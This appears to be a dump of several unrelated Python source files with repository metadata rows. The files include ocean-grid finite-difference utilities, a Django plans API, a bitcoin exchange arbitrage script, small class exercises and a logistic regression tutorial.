w1 = self._gridj2jminus(w,mvol)
mvol1 = self._gridj2jminus(mvol,msk)
w2 = self._gridi2iminus(w1,mvol1)
return w2
def gridV_2_gridU(self,v):
return self._grid_2_grid_iright_jleft(v,self.v_surf,self.vmask)
def gridU_2_gridV(self,u):
return self._grid_2_grid_ileft_jright(u,self.u_surf,self.umask)
def gridT_2_gridV(self,v):
"""Return v (gridT) on gridV."""
return self._gridj2jplus(v,self.t_surf)
def gridT_2_gridU(self,u):
"""Return u (gridT) on gridU."""
return self._gridi2iplus(u,self.t_surf)
def gridU_2_gridT(self,u):
"""Return u (gridU) on gridT
"""
return self._gridi2iminus(u,self.u_surf)
def gridV_2_gridT(self,v):
"""Return v (gridV) on gridT
"""
return self._gridj2jminus(v,self.v_surf)
#---------------------------- Vector Operators -----------------------------------
def lamV(self,lam,V):
"""
Return lambda * V.
input
-lam : T-grid
-V : U,V,W grid
output
-lamV : U,V,W grid
"""
lamx = self.gridT_2_gridU(lam)
lamVx = lamx * V[0]
lamy = self.gridT_2_gridV(lam)
lamVy = lamy * V[1]
return lamVx,lamVy
def dot(self,a,b,stag_grd=False):
"""
Return the dot product a.b.
-----------------------------
input :
ax,bx : grid U
ax,by : grid V
output :
p : grid T
"""
#
ma1 = self.gridU_2_gridT(a[0])
mb1 = self.gridU_2_gridT(b[0])
ma2 = self.gridV_2_gridT(a[1])
mb2 = self.gridV_2_gridT(b[1])
p = ma1 * mb1 + ma2 * mb2
return p
#---------------------------- Finite Differences ---------------------------------
def d_i(self,q,partial_steps=None):
"""Return difference q(i+1)-q(i)
"""
jpi=self.jpi
di= q[...,1:jpi]-q[...,0:jpi-1]
return di
def d_j(self,q,partial_steps=None):
"""Return difference q(j+1)-q(j)
"""
jpj=self.jpj
dj=q[...,1:jpj,:]-q[...,0:jpj-1,:]
return dj
def m_i(self,q):
"""Return the average of q(i+1) and q(i)
"""
#
jpi=self.jpi
mi= q[...,1:jpi]+q[...,0:jpi-1]
mi/=2.
return mi
def m_j(self,q):
"""Return the average of q(j+1) and q(j)
"""
#
jpj=self.jpj
mj=q[...,1:jpj,:]+q[...,0:jpj-1,:]
mj/=2.
return mj
def setBC(self,q,axis,lim,msk_value=1E20):
"""Extends an array to fit the initial grid."""
BC_shape=npy.array(q.shape,dtype=dfloat,subok=True) # subok is probably useles...
if axis=='i':
nax=-1
elif axis=='j':
nax=-2
elif axis=='k':
nax=-3
#
BC_shape[nax] = 1
BC = N.ones(BC_shape) * msk_value
#
if lim==-1:
new_q=npy.concatenate((q,BC),axis=nax)
elif lim==1:
new_q=npy.concatenate((BC,q),axis=nax)
#
return new_q
def grad(self,q,masked=False):
"""
Return the 2D gradient of a scalar field.
input : on T grid
output : on U,V grid
"""
#
jpj,jpi = self.shape
#
gx=self.d_i(q)
gx/=self.e1u[:,0:jpi-1]
#
gy=self.d_j(q)
gy/=self.e2v[0:jpj-1,:]
#
Bgx=self.setBC(gx,'i',-1)
Bgy=self.setBC(gy,'j',-1)
#
if masked:
Bgx=self.set_mask(Bgx,self.umask)
Bgy=self.set_mask(Bgy,self.vmask)
return Bgx,Bgy
def matrixgradient(self,u,v,masked=False):
"""Return the 2d tensor of the gradient of a vector field.
ux,vy : at t-points
uy,vx : at f-points
"""
jpj,jpi = self.shape
ux = self.d_i(self.e2u * u)[...,:,:] / (self.e1t*self.e2t)[...,:,1:jpi]
ux = self.setBC(ux,'i',-1) # t-point
vy = self.d_j(self.e1v * v)[...,:,:] / (self.e1t*self.e2t)[...,1:jpj,:]
vy = self.setBC(vy,'j',-1) # t-point
uy = self.d_j(self.e1u * u)[...,:,:] / (self.e1f*self.e2f)[...,0:jpj-1,:]
uy = self.setBC(uy,'j',-1) # f-point
vx = self.d_i(self.e2v * v)[...,:,:] / (self.e1f*self.e2f)[...,:,0:jpi-1]
vx = self.setBC(vx,'i',-1) # f-point
if masked:
ux = self.set_mask(ux,self.tmask)
vy = self.set_mask(vy,self.tmask)
vx = self.set_mask(vx,self.fmask)
uy = self.set_mask(uy,self.fmask)
return {'ux':ux,'vy':vy,'uy':uy,'vx':vx}
def curl(self,a,masked=False):
"""Return the vertical component of the curl of a vector field.
"""
#
a1 = a[0]
a2 = a[1]
#
jpi = self.jpi
jpj = self.jpj
#
cz = ( self.d_i(self.e2v*a2)[...,0:jpj-1,:]\
- self.d_j(self.e1u*a1)[...,:,0:jpi-1] )
cz/= (self.e1f*self.e2f)[...,0:jpj-1,0:jpi-1]
#
Bcz = self.setBC(self.setBC(cz,'i',-1),'j',-1)
#
if masked:
Bcz = self.set_mask(Bcz,self.fmask)
return Bcz
def div(self,a,masked=False):
"""
Return the 2D divergence of a vector field.
input : grid U,V
output : grid T
"""
#
a1=a[0]
a2=a[1]
#
jpi=self.jpi
jpj=self.jpj
#
d=self.d_i(self.e2u*a1)[...,1:jpj,:]+self.d_j(self.e1v*a2)[...,:,1:jpi]
d/=(self.e1t*self.e2t)[...,1:jpj,1:jpi]
#
Bd=self.setBC(self.setBC(d,'i',1),'j',1)
#
if masked:
Bd = self.set_mask(Bd,self.tmask)
#
return Bd
def shear_strain(self,a,masked=False):
"""Return the rate of shear strain r = vx + uy on the f-grid.
"""
a1=a[0]
a2=a[1]
#
jpi=self.jpi
jpj=self.jpj
#
r = ( self.d_i(self.e2v*a2)[...,0:jpj-1,:]\
+ self.d_j(self.e1u*a1)[...,:,0:jpi-1] )
r/= (self.e1f*self.e2f)[...,0:jpj-1,0:jpi-1]
#
Br = self.setBC(self.setBC(r,'i',-1),'j',-1)
if masked:
Br = self.set_mask(Br,self.fmask)
return Br
def normal_strain(self,uv,masked=False):
"""Return the normal rate of strain a = ux - vy on the T-grid.
"""
u=uv[0]
v=uv[1]
#
jpi=self.jpi
jpj=self.jpj
#
a = self.d_i(self.e2u*u)[...,1:jpj,:] - self.d_j(self.e1v*v)[...,:,1:jpi]
a/=(self.e1t*self.e2t)[...,1:jpj,1:jpi]
Ba = self.setBC(self.setBC(a,'i',1),'j',1)
if masked:
Ba = self.set_mask(Ba,self.tmask)
return Ba
def ssh2uv(self,ssh):
"""Return u,v from sea surfac height on the grid
"""
self._get_corio()
hx,hy = self.grad(ssh)
gf_u = grav / self.corio_u
gf_u[npy.where(npy.abs(self.gphiu)<5.)] = 0
gf_v = grav / self.corio_v
gf_v[npy.where(npy.abs(self.gphiv)<5.)] = 0
u = - gf_u * self.gridV_2_gridU(hy)
v = gf_v * self.gridU_2_gridV(hx)
return u,v
#------------------------ Specific Grids------------------------------------
def gridAVISO_onethird():
"""Return a grid object corresponding to AVISO 1/3 global MERCATOR grid.
"""
import IoData
lat,lon = IoData.getAVISOlatlon()
grd = grid2D(navlon=lon,navlat=lat)
return grd
def gridAVISO_qd():
"""Return a grid object corresponding to AVISO 1/3 global qd grid.
"""
import IoData
lat,lon = IoData.getAVISOlatlon_qd()
grd = grid2D(navlon=lon,navlat=lat)
return grd
def gridNOAA_onequarter():
"""Return a grid object corresponding to NCDC/NOAA 1/4 global grid.
"""
import IoData
lat,lon,mask = IoData.getNOAAlatlonmask()
grd = grid2D(navlon=lon,navlat=lat,mask=mask)
return grd
#====================== Interpolation ======================================
class stdRegridder:
"""bilinear interpolation with basemap.interp. assumes the grid is rectangular.
"""
def __init__(self,xin=None,yin=None,xout=None,yout=None,method='basemap'):
self.xin = xin[0,:]
self.yin = yin[:,0]
self.xout = xout
self.yout = yout
self.method = method
def __call__(self,array):
masked = ma.is_masked(array)
if self.method is 'basemap':
return basemap.interp(array, self.xin, self.yin, self.xout, self.yout, checkbounds=False, masked=masked, order=1)
elif self.method is 'scipy':
import scipy.interpolate
interp = scipy.interpolate.interp2d(self.xin, self.yin, array, kind='linear')
a1d = interp(self.xout[0,:],self.yout[:,0])
return npy.reshape(a1d,self.yout.shape)
def grdRegridder(grdin=None,grdout=None,grdintype='t',grdouttype='t'):
"""Return a regridder based on grd instances.
"""
xin = eval('grdin.glam' + grdintype)
yin = eval('grdin.gphi' + grdintype)
xout = eval('grdout.glam' + grdouttype)
yout = eval('grdout.gphi' + grdouttype)
return stdRegridder(xin=xin,yin=yin,xout=xout,yout=yout)
#====================== Carsening ======================================
def boxcar_factor_test(array2D,icrs=3,jcrs=3):
"""Test whether the shape of array2D is suited to coarsening with icrs,jcrs
"""
jpj, jpi = array2D.shape
if jpj%jcrs==0 and jpi%icrs==0:
return True
else:
return False
def boxcar_reshape(array2D,icrs=3,jcrs=3):
"""Return a 3D array where values in boxes added in extra dimensions
"""
if not(boxcar_factor_test(array2D,icrs=icrs,jcrs=jcrs)):
print("shape and coarsening factors are not compatible")
return
jpj, jpi = array2D.shape
# target shape is shape = (jcrs, icrs, jpj/jcrs, jpi/icrs)
t = np.reshape(array2D,(jpj,-1,icrs)) # (jpj, jpi/icrs, icrs)
tt = t.swapaxes(0,2) # (icrs,jpi/icrs, jpi)
ttt = np.reshape(tt,(icrs,jpi//icrs,-1,jcrs)) # (icrs,jpi/icrs,jpj/jcrs, jcrs)
tttt = ttt.swapaxes(1,3) # (icrs,jcrs,jpj/jcrs, jpi/icrs)
ttttt = tttt.swapaxes(0,1) # (jcrs,icrs,jpj/jcrs, jpi/icrs)
return ttttt
def boxcar_ravel(array2D,icrs=3,jcrs=3):
"""Return a 3D array where values in boxes are broadcasted along the third axis.
output shape is (icrs*jcrs,jpj_crs,jpi_csr)
"""
if not(boxcar_factor_test(array2D,icrs=icrs,jcrs=jcrs)):
print("shape and coarsening factors are not compatible")
return
reshaped = boxcar_reshape(array2D,icrs=icrs,jcrs=jcrs)
dum,dum,jpj,jpi = reshaped.shape
raveled = reshaped.reshape((icrs*jcrs,jpj,jpi))
return raveled
def boxcar_deep_ravel(array2D,icrs=3,jcrs=3):
"""Return a 3D array are
output shape is (jpj_crs*jpi_csr,jcrs,icrs)
"""
if not(boxcar_factor_test(array2D,icrs=icrs,jcrs=jcrs)):
print("shape and coarsening factors are not compatible")
return
reshaped = boxcar_reshape(array2D,icrs=icrs,jcrs=jcrs)
dum,dum,jpj,jpi = reshaped.shape
deep_raveled = reshaped.reshape((jcrs,icrs,jpj*jpi))
deep_raveled = np.rollaxis(deep_raveled,2)
return deep_raveled
def boxcar_sum(array2D,icrs=3,jcrs=3):
"""Return an array with values corresponding to sums of array2D within boxes.
"""
if not(boxcar_factor_test(array2D,icrs=icrs,jcrs=jcrs)):
print("shape and coarsening factors are not compatible")
return
jpj, jpi = array2D.shape
shape = (jpj/jcrs, jpi/icrs)
sum_array = boxcar_ravel(array2D,icrs=icrs,jcrs=jcrs).sum(axis=0)
return sum_array
class grdCoarsener:
"""Return a method that implements coarsening for a given input grid.
"""
def __init__(self,grdin,x_offset=0,y_offset=0,crs_factor=3):
# loading
self.fine_grid = grdin
self.x_offset = x_offset
self.y_offset = y_offset
self.crs_factor = crs_factor
self.fine_shape = grdin.shape
self.crs_factor = crs_factor
# indices
jpj,jpi = self.fine_shape
jcrs, icrs = crs_factor, crs_factor
jsize = jpj - (jpj - y_offset) % jcrs #- y_offset
isize = jpi - (jpi - x_offset) % icrs #- x_offset
self.crs_shape = ( isize / jcrs , isize / icrs )
self.cut_array = lambda array2D:array2D[...,y_offset:jsize,x_offset:isize]
self.weights = self.cut_array(self.fine_grid.t_surf)
self.crs_area = boxcar_sum(self.weights,icrs=self.crs_factor,jcrs=self.crs_factor)
self.crs_shape = self.crs_area.shape
def __call__(self,array2D):
cut_array2D = self.cut_array(array2D)
bxc = lambda a:boxcar_sum(a,icrs=self.crs_factor,jcrs=self.crs_factor)
return bxc(cut_array2D * self.weights) / self.crs_area
def return_ravel(self,array2D):
cut_array2D = self.cut_array(array2D)
rvl = lambda a:boxcar_ravel(a,icrs=self.crs_factor,jcrs=self.crs_factor)
return rvl(cut_array2D)
def return_deep_ravel(self,array2D):
# invers with reshape(array2D.shape)
cut_array2D = self.cut_array(array2D)
rvl = lambda a:boxcar_deep_ravel(a,icrs=self.crs_factor,jcrs=self.crs_factor)
return rvl(cut_array2D)
#====================== Coriolis ===========================================
def corio(dom,grid='t'):
"""Return Coriolis parameter.
"""
exec('lat = dom.gphi' + grid)
f = 2.*omega*npy.sin(lat*deg2rad)
return f
def beta(dom,grid='t'):
"""Return planetary beta.
"""
exec('lat = dom.gphi' + grid)
beta = 2.*omega*npy.cos(lat*deg2rad) / earthrad
return beta
#====================== Miscellaneous ======================================
def nan_to_zero(gz,max_val=1E20):
"""."""
cgz = numpy.nan_to_num(gz)
cgz[numpy.where(numpy.abs(cgz)>=max_val)]=0
return cgz
def nan_to_mskval(gz,mskval=1.E20):
tmp = -9E9*npy.pi
lgz = gz.copy()
lgz[npy.where(lgz==0.)]=tmp
lgz = npy.nan_to_num(lgz)
lgz[npy.where(lgz==0.)]=mskval
lgz[npy.where(lgz==tmp)]=0.
return lgz
#==================
# from http://wiki.scipy.org/Cookbook/SignalSmooth
def gauss_kern(size, sizey=None):
""" Returns a normalized 2D gauss kernel array for convolutions """
from pylab import mgrid
from numpy import exp
size = int(size)
if not sizey:
sizey = size
else:
sizey = int(sizey)
x, y = mgrid[-size:size+1, -sizey:sizey+1]
g = exp(-(x**2/float(size)+y**2/float(sizey)))
return g / g.sum()
def blur_image(im, n, ny=None) :
""" blurs the image by convolving with a gaussian kernel of typical
size n. The optional keyword argument ny allows for a different
size in the y direction.
"""
from scipy import signal
g = gauss_kern(n, sizey=ny)
improc = signal.convolve(im,g, mode='same')
return(improc)
| [
"[email protected]"
] | |
20e8763d4c550eaf3adde13df6802f816d95608e | d6806adbc43ce2b53b00e4c99f196fb325db0bda | /mailprinter/core/config.py | 20599e6893a76dcc2d9eedf9fd2fde23f622e7e3 | [
"MIT"
] | permissive | AbhyudayaSharma/MailPrinter | b4e5e4f78052e11e344aa85f8c2115d014a44646 | d80c4a60f82b62f832af95f7b0e4fc025897fbd2 | refs/heads/master | 2020-04-12T02:17:22.408509 | 2019-03-13T12:10:22 | 2019-03-13T12:10:22 | 162,244,471 | 6 | 2 | null | null | null | null | UTF-8 | Python | false | false | 277 | py | import json
import sys
def get_config():
with open('config.json', 'r') as f:
try:
data = json.load(f)
return data
except Exception:
print('Invalid configuration detected!', file=sys.stderr)
sys.exit(-1)
| [
"[email protected]"
] | |
fcb2204485c65ca6cb13e7aaa58aaeec0ba17c73 | cceba07bf7c2446f49037560fb27350e11480844 | /classes/herencia_multiple/triangulo.py | 7d0b7e305f7cf4ec0563c8e5f838216a06f27bc2 | [] | no_license | AcxelMorales/Learn-Python | a1761ba1a218fe13919bd6119f7801d1c0463812 | 83cb820ae9db4a18f885a56dcc3a4ec5ac71b0f6 | refs/heads/master | 2022-10-23T23:04:27.768234 | 2020-06-10T19:18:45 | 2020-06-10T19:18:45 | 270,060,397 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 655 | py | from classes.herencia_multiple.color import Color
from classes.herencia_multiple.figura_geo import FiguraGeometrica
class Triangulo(FiguraGeometrica, Color):
def __init__(self, base, altura, color):
self.__base = base
self.__altura = altura
FiguraGeometrica.__init__(self, base, altura)
Color.__init__(self, color)
def get_base(self):
return self.__base
def set_base(self, base):
self.__base = base
def get_altura(self):
return self.__altura
def set_altura(self, altura):
self.__altura = altura
def area(self):
return (self.__base * self.__altura) / 2
| [
"[email protected]"
] | |
e214d27909581df309eb841f8dc0101a45ec01f0 | 3f73663c0949cab0d840de2e3f001cb98c236ee5 | /30-Days-of-Code/day-06.py | 4eef100d0b7fc5299962c9d925137ebbfadb82b0 | [] | no_license | aditya2082/HackerRank-Solution-in-Python | 0dcd231a5b5fcb1174039b484a58ebb94871ef0b | bef64ad8d342d32e23190ed15d0a4beab9e450cc | refs/heads/master | 2022-06-29T09:30:38.776469 | 2020-05-13T22:25:33 | 2020-05-13T22:25:33 | 263,752,680 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 683 | py | """
Task
Given a string, S, of length N that is indexed from 0 to N-1, print its even-indexed and odd-indexed characters as 2 space-separated
strings on a single line (see the Sample below for more detail).
Note: 0 is considered to be an even index.
Input Format
The first line contains an integer, T (the number of test cases).
Each line i of the T subsequent lines contain a String, S.
Output Format
For each String S<j> (where 0<=j<=T-1), print S<j>'s even-indexed characters, followed by a space, followed by S<j>'s odd-indexed characters.
Sample Input
2
Hacker
Rank
Sample Output
Hce akr
Rn ak
"""
for _ in range(int(input())):
s = input()
print(s[0::2],s[1::2])
| [
"[email protected]"
] | |
144fa1cbba693de8b826e0041cd05a98c94b0874 | 4ee1d690aee51b13091cb2397bcad8254da446f1 | /fontproperty.py | 498efd5145b694ca01b410ec7c0490554f4d5ad7 | [] | no_license | xyl576807077/BackgroundRemove | 4a80752e09d6e3791f22e726cd4eef0154ec1216 | c6df04e764b3fd172caf89a90e53e1da62c077a7 | refs/heads/master | 2020-03-09T23:06:35.023744 | 2018-05-16T02:52:52 | 2018-05-16T02:52:52 | 129,051,132 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 620 | py | from PIL import ImageFont, Image
import json
import numpy
class Fontproperty:
def __init__(self, simplifychinese, traditionchinese,english,symbol):
with open(simplifychinese, 'r') as f:
self.simplifychinese = json.load(f)
with open(traditionchinese, 'r') as f:
self.traditionchinese = json.load(f)
with open(english, 'r') as f:
self.english = json.load(f)
with open(symbol, 'r') as f:
self.symbol = json.load(f)
def __call__(self, text, font_size):
pass
def choose_font(self, text):
pass | [
"[email protected]"
] | |
5f29564bb01514fd2cfc87dcb2dc4271c041b9b9 | f6f53f6f818e3c6be42ef801348b095e86e27669 | /Tutorial 24/classes_with_methods.py | 20cc17e4a0f056a553190f72a924f11e02bab7fd | [] | no_license | Loliloltrop/YouTube | f6b3cccf8c8fbcd699e0ff21225c411803818310 | caccbb61975ec075429c87963708452548281c31 | refs/heads/master | 2023-06-18T17:27:26.514556 | 2021-07-17T15:36:20 | 2021-07-17T15:36:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 499 | py | class student:
def __init__(self,name,grade,gpa):
self.name = name
self.grade = grade
self.gpa = gpa
def honors(self):
if (self.gpa >= 4.0):
return "Highest Honors"
elif (self.gpa >= 3.75):
return "High Honors"
elif (self.gpa >= 3.5):
return "Honors"
else:
return None
student1 = student("Eli",12,4.32)
student2 = student("Emilo",11,3.96)
#print(student1.name)
#print(student2.honors())
| [
"[email protected]"
] | |
ab7c4c3236c6145f24bd63e0157741f814de1832 | 6c14c1ed66e14fb86a01d87265f45ff0056e5b10 | /python/lsst/ctrl/stats/records/generic.py | 7e63c1ad9bf898a539ea22a75bb53ca063574f09 | [] | no_license | jonathansick-shadow/ctrl_stats | ba345f71a3e6df6b4b44cac9cb67bb86c25bfe52 | 88c633477651039cb18a9bf5c30316b8545c4bcd | refs/heads/master | 2021-01-12T12:02:59.321515 | 2016-02-02T19:23:27 | 2016-02-02T19:23:27 | 45,875,277 | 0 | 0 | null | 2015-11-09T23:59:16 | 2015-11-09T23:59:16 | null | UTF-8 | Python | false | false | 1,275 | py | #
# LSST Data Management System
# Copyright 2008-2012 LSST Corporation.
#
# This product includes software developed by the
# LSST Project (http://www.lsst.org/).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the LSST License Statement and
# the GNU General Public License along with this program. If not,
# see <http://www.lsstcorp.org/LegalNotices/>.
#
from record import Record
class Generic(Record):
"""
Generic log event
Listed in documention as not used, but here for completeness.
"""
def __init__(self, year, lines):
"""
Constructor
@param year - the year to tag the job with
@param lines - the strings making up this record
"""
Record.__init__(self, year, lines)
eventClass = Generic
eventCode = "008"
| [
"[email protected]"
] | |
5bd49bf0df1d788a908f29a26c2da3822e667908 | f3094f80d18015dc84f2da56cd0903bdfd04e9cc | /workouts/plans_api.py | 2debd6da72fe7cabf9950cb52d010c5c05cd9fd4 | [] | no_license | RDK90/lift_app | a18fb572bad6c0c121f168c588ac2ddfb60f7de8 | 6d44cd53861b516b1cbcfec28f4dd6cfefff4326 | refs/heads/development | 2021-06-18T20:00:28.653254 | 2021-03-21T17:45:07 | 2021-03-21T17:45:07 | 184,144,218 | 1 | 0 | null | 2021-03-18T18:32:44 | 2019-04-29T21:06:08 | Python | UTF-8 | Python | false | false | 2,700 | py | from rest_framework import status
from rest_framework.decorators import api_view
from rest_framework.response import Response
from rest_framework.views import APIView
from workouts.api_support import *
from .models import Profile, PlanVersionTwo, Plan
from .serializers import PlanSerializer
@api_view(['GET'])
def all_plans(request):
if request.method == "GET":
workouts = Plan.objects.all()
plan_serializer = PlanSerializer(workouts, many=True)
response_data = [{"date":"", "workout":[]}]
index = 0
for plan in plan_serializer.data:
date = plan.pop("date")
if response_data[index]["date"] == "" or response_data[index]["date"] != date:
response_data.append({"date":date, "workout":[plan]})
index = index + 1
else:
response_data[index]["workout"].append(plan)
response_data.pop(0)
return Response(response_data)
@api_view(['GET','PUT', 'POST', 'DELETE'])
def plans_by_date(request, date):
date = format_date(date)
try:
workouts = Plan.objects.filter(date=date).values()
except:
return Response(status=status.HTTP_400_BAD_REQUEST)
if request.method == "GET":
if not workouts:
content = {"Error message": "No plan for date {} found".format(date)}
return Response(content, status=status.HTTP_404_NOT_FOUND)
else:
plan_serializer = PlanSerializer(workouts, many=True)
for plans in plan_serializer.data:
plans.pop("date")
return Response({"date":date, "plan": plan_serializer.data})
if request.method == "PUT" or request.method == "POST":
return put_post_workouts_by_id_response(request)
if request.method == "DELETE":
plan = Plan.objects.filter(date=date)
plan.delete()
return Response(status=status.HTTP_204_NO_CONTENT)
@api_view(['GET'])
def all_plans_version_two(request):
if request.method == "GET":
profile_user = Profile.objects.get(user=request.user)
workouts = PlanVersionTwo.objects.filter(user=profile_user)
plan_serializer = PlanSerializer(workouts, many=True)
response_data = [{"date":"", "workout":[]}]
index = 0
for plan in plan_serializer.data:
date = plan.pop("date")
if response_data[index]["date"] == "" or response_data[index]["date"] != date:
response_data.append({"date":date, "workout":[plan]})
index = index + 1
else:
response_data[index]["workout"].append(plan)
response_data.pop(0)
return Response(response_data) | [
"[email protected]"
] | |
49e906ecd28d07f5e8286c16fd8a21a5e83f2e9b | 4c8c618535998d5aba5bdd365a95fc94aa8a90b9 | /twitchanalysis/__init__.py | 2302d36eb1c8e934f2389be70cef46e705f06f27 | [
"MIT"
] | permissive | Muddy91/TwitchAnalysis | d4429a5ee70cd7a76ceb9a932f9181225fe775f8 | c5b61412928e2e92b5b41a5a4d8e1fca54d3365a | refs/heads/master | 2020-03-27T11:10:23.590654 | 2017-11-28T02:22:07 | 2017-11-28T02:22:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 23 | py | __all__ = [
'main'
]
| [
"[email protected]"
] | |
52103ab2e3d54d3f7803764e783d2d6f99f5ea25 | 11cef88c061c5e94bb135a981aa74f674c17377d | /crash-course/unit10/exception/alice.py | fd47bc40f7785ac5da27c0d4feab9fad2a4f9010 | [] | no_license | aqing1987/python101 | 77f1a1d405f38aeaeff3ad469277ba79e11b5b96 | 534afe55ed4447f63bc625cc17a6832a46b19f56 | refs/heads/master | 2020-09-17T01:57:18.008387 | 2020-08-10T13:18:04 | 2020-08-10T13:18:04 | 223,954,062 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 96 | py | filename = 'alice1.txt' # not exist
with open(filename) as f_obj:
contents = f_obj.read()
| [
"[email protected]"
] | |
2cd727d2644671964201a7611979c86d6ff66adf | ad113ffed76e72ed0a881a7a6d6a74ea9021e5bf | /compare.py | 74efd55a7fb781291d78599eebebe9112337dc54 | [] | no_license | biletboh/bitexchange | 03c0bfc04e2f103928c173f014a75b6ceea0def9 | 8d541d6bb82f5e3ff4c71cb65b609503ba6b9417 | refs/heads/master | 2021-01-22T10:46:46.717291 | 2017-05-30T14:43:37 | 2017-05-30T14:43:37 | 92,656,591 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,907 | py | import time
def compare_exchange(tradeclient, tradeclient2, bitfinex, exmo):
""" Compare exchange rates at bitfinex and ___
Buy bitcoins at the exchange with lower rates.
Sell bitcoins at the exchange with higher rates.
"""
# Check if the difference between rates is higher than 1.5%
# Case 1: second exchange is cheaper than first
if (float(bitfinex[1])-float(exmo[0]))*100/float(bitfinex[1]) > 1.5:
# Buy bitcoins at exmo
buy_order = tradeclient2.place_order('BTC_USD', 1, exmo[0], 'buy')
# Get bitcoin deposit address at bitfinex
deposit_btc_bitfinex = tradeclient.deposit_btc('bitcoin', 'exchange', renew=0)
# Withdraw bitcoins from exmo to bitfinex
while True:
if isinstance(buy_order, str): # Check for error messages
print('Error Message: ', buy_order)
else:
order_id=buy_order['order_id']
try:
status_order = tradeclient2.open_orders(order_id)
except:
print('Error Message: Provide valid order id for a withdrawal.')
break
if status_order['remaining_amount'] == 0:
if deposit_btc_bitfinex:
withdraw = tradeclient2.withdraw_crypto(1, 'BTC', deposit_btc_bitfinex)
break
else:
print('Set up bitfinex deposit address')
break
time.sleep(1)
# Sell bitcoins at bitfinex
sell_order = tradeclient.place_order('1', str(bitfinex[1]), 'sell', 'exchange market')
# Get Deposit address for USD funds at exmo
dpt_usd_exmo = tradeclient2.deposit_usd()
# Withdraw funds from bitfinex USD account when an order is done
while True:
if isinstance(sell_order, str): # Check for error messages
print('Error Message: ', sell_order)
else:
order_id = sell_order['order_id']
try:
status_order = tradeclient.status_order(order_id)
except:
print('Error Message: Provide valid order id for a withdrawal.')
break
if status_order['remaining_amount'] == 0:
try:
dpt_usd_exmo['bank_account']
withdraw_usd = tradeclient.withdraw_usd(
'bitcoin', 'exchange', '1',
dpt_usd_exmo['bank_account'],
dpt_usd_exmo['bank_name'],
dpt_usd_exmo['bank_address'],
dpt_usd_exmo['usdbank_city'],
dpt_usd_exmo['bank_country']
)
break
except:
print('Error Message: Set up exmo usd account details for the withdrawal.')
break
time.sleep(1)
# Case 2: first exchange is cheaper than second
elif (float(exmo[1])-float(bitfinex[0]))*100/float(exmo[1]) > 1.5:
# Buy bitcoins at bitfinex
sell_order = tradeclient.place_order('1', str(bitfinex[0]), 'buy', 'exchange market')
# Get bitcoin deposit address at exmo
deposit_btc_exmo = tradeclient2.deposit_btc()
# Withdraw funds from bitfinex BTC account when an order is done
while True:
if isinstance(sell_order, str): # Check for error messages
print('Error Message: ', sell_order)
else:
order_id=sell_order['order_id']
try:
status_order = tradeclient.status_order(order_id)
except:
print('Error Message: Provide valid order id for a withdrawal')
break
if status_order['remaining_amount'] == 0:
if deposit_btc_exmo:
withdraw_usd = tradeclient.withdraw_crypto('bitcoin', 'exchange', '1', deposit_btc_exmo)
break
else:
print('Error Message: Set up exmo btc address')
break
time.sleep(1)
# Sell bitcoins at exmo
sell_order = tradeclient2.place_order('BTC_USD', 1, exmo[1], 'sell')
# Deposit USD funds to bitfinex
# Wire deposits at Bitinex have been paused.
print('Error Message: Cannot deposit USD funds. USD depoist at bitfinex is currently unavailable.')
# Withdraw usd from exmo to bitfinex
while True:
if isinstance(sell_order, str): # Check for error messages
print('Error Message: ', sell_order)
else:
order_id=sell_order['order_id']
try:
order_id=sell_order['order_id']
except:
print('Error: Provide valid order id')
break
try:
status_order = tradeclient2.trade_deals('BTC_USD', 1)[0]['trade_id']
except:
print('Error Message: you have no trade deals')
break
if status_order[0]['trade_id'] == order_id:
if deposit_btc_bitfinex:
withdraw = tradeclient2.withdraw_crypto(1, 'BTC', deposit_btc_bitfinex)
break
else:
print('Set up bitfinex deposit address')
break
time.sleep(1)
# Case 3: an exchange difference is below 1.5%
else:
# Do nothing if the rate diffrence is lower than 1.5%
print('Exchange rate difference is lower than 1.5%')
pass
| [
"[email protected]"
] | |
f2245457405d0ab361d32a4bab82482856388e47 | bdd02d756c4ea770b4599ef9aa3292ee419acf35 | /logistic_regression.py | cadd18e7ca6e08905ce7aa764e756130fcae72b8 | [] | no_license | Jjrex8988/Python_Project_DS_Logistic_Regression_Classification | e8d1d5f6d6d13da8696b337152e9610117459486 | c48c1288fe91e6018566ddc56552852f205da94a | refs/heads/master | 2023-05-08T20:17:00.832817 | 2021-06-03T13:22:30 | 2021-06-03T13:22:30 | 373,514,890 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,170 | py | # Logistic Regression
# Importing the libraries
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
# Importing the dataset
dataset = pd.read_csv('Social_Network_Ads.csv')
X = dataset.iloc[:, :-1].values
y = dataset.iloc[:, -1].values
# Splitting the dataset into the Training set and Test set
from sklearn.model_selection import train_test_split
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25, random_state=0)
print(X_train)
print('-' * 38)
print(y_train)
print('-' * 38)
print(X_test)
print('-' * 38)
print(y_test)
print('-' * 38)
# Feature Scaling
from sklearn.preprocessing import StandardScaler
sc = StandardScaler()
X_train = sc.fit_transform(X_train)
X_test = sc.transform(X_test)
print(X_train)
print('-' * 38)
print(X_test)
print('-' * 38)
# Training the Logistic Regression model on the Training set
from sklearn.linear_model import LogisticRegression
classifier = LogisticRegression(random_state=0)
classifier.fit(X_train, y_train)
# Predicting the Test set results
y_pred = classifier.predict(X_test)
print(y_pred)
print('-' * 38)
print(np.concatenate((y_pred.reshape(len(y_pred), 1), y_test.reshape(len(y_test), 1)), 1))
print('-' * 38)
# Making the Confusion Matrix
from sklearn.metrics import confusion_matrix, accuracy_score
cm = confusion_matrix(y_test, y_pred)
print(cm)
print('-' * 38)
print(accuracy_score(y_test, y_pred))
print('-' * 38)
# Applying k-Fold Cross Validation
from sklearn.model_selection import cross_val_score
